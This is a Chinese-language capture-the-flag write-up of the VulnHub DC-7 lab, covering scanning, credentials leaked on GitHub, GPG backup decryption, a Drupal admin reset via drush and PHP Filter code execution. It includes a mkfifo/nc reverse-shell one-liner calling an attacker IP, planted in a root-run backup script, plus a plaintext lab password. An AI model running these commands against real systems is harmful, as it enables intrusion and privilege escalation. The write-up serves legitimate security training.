VulnHub::DC-7

实验环境

提示改靶机只有一个入口点，并只存在一个flag

渗透过程

0x01 信息搜集

由于不知道靶机IP地址，进行D段扫描，获得靶机IP地址：

masscan：

masscan 192.168.2.0/24 -p80 --rate 1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-23 04:08:53 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 80/tcp on 192.168.2.160
Discovered open port 80/tcp on 192.168.2.1

nmap：

nmap -sP 192.168.2.0/24 --min-rate 1000
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:10 CST
Nmap scan report for RT-N56U_B1.lan (192.168.2.1)
Host is up (0.0022s latency).
Nmap scan report for dc-7.lan (192.168.2.160)
Host is up (0.00084s latency).
Nmap scan report for Administrator.lan (192.168.2.210)
Host is up (0.00066s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 10.72 seconds

访问后发现160主机为靶机DC-7，进行端口扫描：

masscan 192.168.2.160 -p0-65535 --rate 1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-23 04:19:37 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 22/tcp on 192.168.2.160
Discovered open port 80/tcp on 192.168.2.160

使用nmap进行详细扫描：

nmap -sC -sV -p22,80 --min-rate 1000 192.168.2.160
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:23 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for dc-7.lan (192.168.2.160)
Host is up (0.00076s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

whatweb识别：

whatweb http://192.168.2.160
http://192.168.2.160 [200 OK] Apache[2.4.25], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[192.168.2.160], MetaGenerator[Drupal 8 (https://www.drupal.org)], PoweredBy[-block], Script, Title[Welcome to DC-7 | D7], UncommonHeaders[x-drupal-dynamic-cache,link,x-content-type-options,x-generator,x-drupal-cache], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]

0x02 解题

探索过程

查找cms通用漏洞，发现存在RCE漏洞，测试后无法利用。

目录扫描未发现利用点。

常见弱口令登录一下，结果发现后台限制了5次登录失败会被暂时锁定。

最后发现靶机提示从外部入手。

解题过程

页面提示开发者为：@DC7USER

查找相关信息发现Github仓库。

得到数据库用户名密码：

dc7user:MdR3xOgB7#dW

竟然能够登录SSH。

文件目录如下：

dc7user@dc-7:~$ ls
backups mbox
dc7user@dc-7:~/backups$ ls
website.sql.gpg  website.tar.gz.gpg

备份中的文件通过gpg加密。查看mbox文件发现备份脚本：

得到gpg加密密码：PickYourOwnPassword。

该备份脚本root、www-data用户可修改。

解密GPG文件：

gpg -d website.tar.gz.gpg > website.tar.gz
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase

得到网站原始文件与数据库信息：

不存在有用信息。

关注到这个drush命令，drush：Drush is a command line shell and Unix scripting interface for Drupal.

可以通过此命令修改drupal用户密码：

修改admin密码，成功登录。

编辑文章后发现没有PHP format：

搜索 Drupal reverse shell 得知需要加载php模块：

使能PHP Filter：

成功接收反弹shell：

修改备份脚本：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.2.210 10086 >/tmp/f

等待root计划任务执行，接收反弹shell：

Reference

Drupal: Reverseshell